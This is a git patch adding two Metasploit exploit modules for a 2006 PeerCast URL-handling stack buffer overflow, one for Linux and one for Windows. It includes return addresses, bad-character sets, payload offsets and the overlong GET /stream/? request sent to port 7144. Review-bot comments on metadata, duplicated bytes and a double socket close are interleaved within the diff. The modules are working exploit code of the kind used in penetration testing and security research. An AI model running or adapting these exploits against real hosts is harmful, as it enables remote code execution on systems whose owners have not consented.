From 86671cef8968c0c3ef330015e1f4002d7784d99a Mon Sep 17 00:00:00 2001
From: HD Moore
Date: Thu, 30 Mar 2006 21:05:42 +0000
Subject: [PATCH] PeerCast exploits
git-svn-id: file:///home/svn/incoming/trunk@3583 4d416f70-5f16-0410-b530-b9f4589650da
---
modules/exploits/linux/http/peercast_url.rb | 65 +++++++++++++++++
modules/exploits/windows/http/peercast_url.rb | 69 +++++++++++++++++++
2 files changed, 134 insertions(+)
create mode 100644 modules/exploits/linux/http/peercast_url.rb
create mode 100644 modules/exploits/windows/http/peercast_url.rb
diff --git a/modules/exploits/linux/http/peercast_url.rb b/modules/exploits/linux/http/peercast_url.rb
new file mode 100644
index 0000000000..22bbd9fd4a
--- /dev/null
+++ b/modules/exploits/linux/http/peercast_url.rb
@@ -0,0 +1,65 @@
+require 'msf/core'
+
+module Msf
+
+class Exploits::Linux::Http::PeerCast_URL < Msf::Exploit::Remote
+
+ include Exploit::Remote::Tcp
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'PeerCast <= 0.1216 URL Handling Buffer Overflow (linux)',
+ 'Description' => %q{
+ This module exploits a stack overflow in PeerCast <= v0.1216.
+ The vulnerability is caused due to a boundary error within the
+ handling of URL parameters.
+
+ },
+ 'Author' => [ 'y0 [at] w00t-shell.net' ],
+ 'License' => MSF_LICENSE,
+ 'Version' => '$Revision$',
+ 'References' =>
+ [
+ ['OSVDB', '23777'],
+ ['BID', '17040'],
+ ['URL', 'http://www.infigo.hr/in_focus/INFIGO-2006-03-01'],
+
+ ],
+ 'Privileged' => false,
+ 'Payload' =>
+ {
+ 'Space' => 200,
+ 'BadChars' => "\x00\x0a\x0d\x20\x0d\x2f\x3d\x3b",
+ 'MinNops' => 64,
+ },
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_X86,
+ 'Targets' =>
+ [
+ ['PeerCast v0.1212 Binary', { 'Ret' => 0x080922f7 }],
+ ],
+ 'DisclosureDate' => 'Mar 8 2006'))
+
+ register_options( [ Opt::RPORT(7144) ], self.class )
+ end
+
+ def exploit
+ connect
+
+ pat = Rex::Text.rand_text_alphanumeric(780)
+ pat << [target.ret].pack('V')
+ pat << payload.encoded
+
+ uri = '/stream/?' + pat
+
+ res = "GET #{uri} HTTP/1.0\r\n\r\n"
+
+ print_status("Trying target address 0x%.8x..." % target.ret)
+ sock.put(res)
+
+ handler
+ disconnect
+ end
+
+end
+end
diff --git a/modules/exploits/windows/http/peercast_url.rb b/modules/exploits/windows/http/peercast_url.rb
new file mode 100644
index 0000000000..43846acaee
--- /dev/null
+++ b/modules/exploits/windows/http/peercast_url.rb
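Review bot: The metadata in linux/http/peercast_url.rb advertises every release up to 0.1216, yet the only entry under 'Targets' is 'PeerCast v0.1212 Binary' with one hard-coded address, and 'Description' never says which builds were verified. If that is the only build tested, I would add a line to the description such as `Verified only against the v0.1212 Linux binary; other builds are untested.` so nobody reads the target list as a statement of which hosts are exposed. The description also leaves out what a defender needs: the request built in `exploit` is a `GET /stream/?` whose query string runs past 780 bytes on TCP 7144, which is worth stating so operators can look for it in HTTP logs or IDS rules, along with a pointer to the fixed release from the referenced advisory. The same gap applies to windows/http/peercast_url.rb, and in both files 'BadChars' lists `\x0d` twice, which is redundant.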
@@ -0,0 +1,69 @@
+require 'msf/core'
+
+module Msf
+
+class Exploits::Windows::Http::PeerCast_URL < Msf::Exploit::Remote
+
+ include Exploit::Remote::Tcp
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'PeerCast <= 0.1216 URL Handling Buffer Overflow (win32)',
+ 'Description' => %q{
+ This module exploits a stack overflow in PeerCast <= v0.1216.
+ The vulnerability is caused due to a boundary error within the
+ handling of URL parameters.
+
+ },
+ 'Author' => [ 'H D Moore ' ],
+ 'License' => MSF_LICENSE,
+ 'Version' => '$Revision$',
+ 'References' =>
+ [
+ ['OSVDB', '23777'],
+ ['BID', '17040'],
+ ['URL', 'http://www.infigo.hr/in_focus/INFIGO-2006-03-01'],
+
+ ],
+ 'Privileged' => false,
+ 'Payload' =>
+ {
+ 'Space' => 400,
+ 'BadChars' => "\x00\x0a\x0d\x20\x0d\x2f\x3d\x3b",
+ 'StackAdjustment' => -3500,
+ },
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],
+ ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],
+ ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],
+ ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],
+ ],
+ 'DisclosureDate' => 'Mar 8 2006'))
+
+ register_options( [ Opt::RPORT(7144) ], self.class )
+ end
+
+ def exploit
+ connect
+
+ pat = Rex::Text.rand_text_alphanumeric(1024)
+ pat[768, 4] = [target.ret].pack('V')
+ pat[812, 5] = [0xe9, -517].pack('CV')
+ pat[300, payload.encoded.length] = payload.encoded
+
+ uri = '/stream/?' + pat
+
+ res = "GET #{uri} HTTP/1.0\r\n\r\n"
+
+ print_status("Trying target address 0x%.8x..." % target.ret)
+ sock.put(res)
+ sock.close
+
+ handler
+ disconnect
+ end
+
+end
+end
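Review bot: In `exploit` in windows/http/peercast_url.rb, `sock.close` is followed two lines later by `disconnect`, which presumably tears down the same socket through the Tcp mixin, so the connection is closed twice. The Linux module in this commit relies on `disconnect` alone; the two files should agree, or the early close should carry a comment such as `# close first so the service processes the request before the handler runs` if that is the intent. The metadata also drifts from the Linux file: there is no 'Arch' key here, and the label 'Windows XP English SP0/SP2' sits directly under 'SP0/SP1' and looks like a typo for a single service pack. That label should be corrected or explained, because the target list is what a reader uses to judge which hosts are affected.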